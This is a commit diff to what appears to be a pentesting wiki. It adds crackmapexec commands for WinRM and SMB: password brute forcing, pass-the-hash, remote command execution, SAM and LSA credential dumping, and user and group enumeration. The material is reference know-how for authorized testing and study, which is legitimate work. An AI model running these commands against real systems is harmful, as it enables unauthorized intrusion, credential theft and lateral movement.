GitBook: [master] 3 pages modified

brute-force.md

@@ -330,6 +330,12 @@ patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x
 nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
 ```
 
+### Winrm
+
+```bash
+crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
+```
+
 ## Local
 
 ### Online cracking databases

pentesting/5985-5986-pentesting-winrm.md

@@ -121,6 +121,18 @@ winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
 
 ## WinRM connection in linux
 
+### Brut Force
+
+```ruby
+#Brute force
+crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
+
+#Just check a pair of credentials
+crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password>
+crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH>
+#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
+```
+
 ### Using evil-winrm
 
 ```ruby

pentesting/pentesting-smb.md

@@ -174,6 +174,7 @@ smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
 smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
 crackmapexec smb <IP> -u '' -p '' --shares #Null user
 crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
+crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
 ```
 
 ### **Connect/List a shared folder**
@@ -268,11 +269,11 @@ smbclient //<IP>/<share>
 Commands:
 
 * mask: specifies the mask which is used to filter the files within the directory \(e.g. "" for all files\)
-* resurse: toggles recursion on \(default: off\)
-* prompt: toggles prompting for filesnames off \(default: on\)
+* recurse: toggles recursion on \(default: off\)
+* prompt: toggles prompting for filenames off \(default: on\)
 * mget: copies all files matching the mask from host to client machine
 
-\(Information from the manpage of smbclient\)
+\(_Information from the manpage of smbclient_\)
 
 ## Authenticate using Kerberos
 
@@ -287,19 +288,29 @@ rpcclient -k ws01win10.domain.com
 
 ### **crackmapexec**
 
+crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec** being **wmiexec** the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`:
+
 ```bash
 apt-get install crackmapexec
 
-crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
-crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
-crackmapexec 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
-# Using --exec-method -1,2,3 wmiexec,atexec,smbexec
+crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
+crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
+crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
+# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
 
-crackmapexec -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
-crackmapexec -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
+crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
+crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
+crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
+crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
+crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
+crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
+crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
+crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
+crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
+crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
 ```
 
-### \*\*\*\*[**psexec**](../windows/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows/ntlm/smbexec.md)\*\*\*\*
+### [**psexec**](../windows/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows/ntlm/smbexec.md)
 
 Both options will **create a new service** \(using _\pipe\svcctl_ via SMB\) in the victim machine and use it to **execute something** \(**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-\).  
 **More info** about [**psexec** ](../windows/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows/ntlm/smbexec.md).  
@@ -362,7 +373,7 @@ ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rid
 ## SMB relay attack
 
 This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.  
-[**More information about this attack here.**](pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)\*\*\*\*
+[**More information about this attack here.**](pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
 
 ## SMB-Trap